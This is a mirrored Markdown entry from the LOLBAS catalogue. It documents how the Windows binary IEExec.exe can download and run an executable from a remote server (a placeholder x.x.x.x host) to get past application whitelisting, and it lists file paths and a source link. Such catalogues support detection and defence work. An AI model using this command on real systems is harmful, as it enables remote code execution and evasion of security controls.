mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 14:59:03 +01:00
18 lines
387 B
Markdown
18 lines
387 B
Markdown
## IEExec.exe
|
|
* Functions: Execute
|
|
```
|
|
|
|
ieexec.exe http://x.x.x.x:8080/bypass.exe
|
|
Executes bypass.exe from the remote server.
|
|
```
|
|
|
|
* Resources:
|
|
* https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
|
|
|
* Full path:
|
|
* c:\windows\system32\ieexec.exe
|
|
* c:\windows\sysWOW64\ieexec.exe
|
|
|
|
* Notes: Thanks to Casey Smith - @subtee
|
|
|